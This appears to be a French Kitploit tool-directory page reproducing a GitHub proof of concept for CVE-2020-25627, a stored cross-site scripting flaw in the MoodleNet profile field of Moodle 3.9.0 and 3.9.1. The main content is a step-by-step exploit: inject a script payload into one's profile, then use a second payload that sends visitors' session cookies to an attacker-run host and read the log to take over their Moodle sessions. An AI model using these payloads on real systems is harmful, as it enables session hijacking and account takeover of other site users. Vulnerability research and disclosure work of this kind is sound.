Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/hoangkien1020/cve-2020-25627
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubhoangkien1020/cve-2020-25627

CVE-2020-25627

XSS stocké via le paramètre moodlenetprofile dans le profil utilisateur

Voir le dépôt
3il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-25627

XSS stocké via le paramètre moodlenetprofile dans le profil utilisateur

Mon PoC sur cette CVE

Prérequis utilisateur : étudiant (ou le site pour l'inscription)

XSS dans moodlenetprofile

root@kitploit:~
Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.

moodlenetprofile parameter

Versions affectées : 3.9.0, 3.9.1

Source

https://moodle.org/mod/forum/discuss.php?d=410839

Impact du XSS (vol de cookies, ...), voir ici :

https://github.com/HoangKien1020/pentest/tree/master/XSS

Télécharger l’outil